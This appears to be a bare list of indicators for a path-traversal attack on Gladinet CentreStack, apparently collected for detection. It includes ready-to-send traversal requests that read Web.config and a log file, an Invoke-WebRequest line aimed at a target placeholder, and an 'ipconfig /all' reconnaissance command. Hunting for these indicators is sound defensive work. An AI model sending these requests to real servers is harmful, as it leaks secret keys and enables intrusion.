/storage/t.dn
GET /storage/t.dn?s=..\..\..\Program+Files+(x86)\Gladinet+Cloud+Enterprise\root\Web.config&sid=1
GET /storage/t.dn?s=..\..\..\programdata\CentreStac_log.txt&sid=1
..\..\..\Program+Files+(x86)\Gladinet+Cloud+Enterprise\root\Web.config
..\..\..\programdata\CentreStac_log.txt
en.fofa.info
Event ID 1316
GladinetStorage.TempDownload
GSUploadDownloadProxy.dll
ipconfig /all > "C:\programdata\CentreStac_log.txt"
Invoke-WebRequest "http://<TARGET>/storage/t.dn?s=..\..\..\Program+Files+(x86)\Gladinet+Cloud+Enterprise\root\Web.config&sid=1"
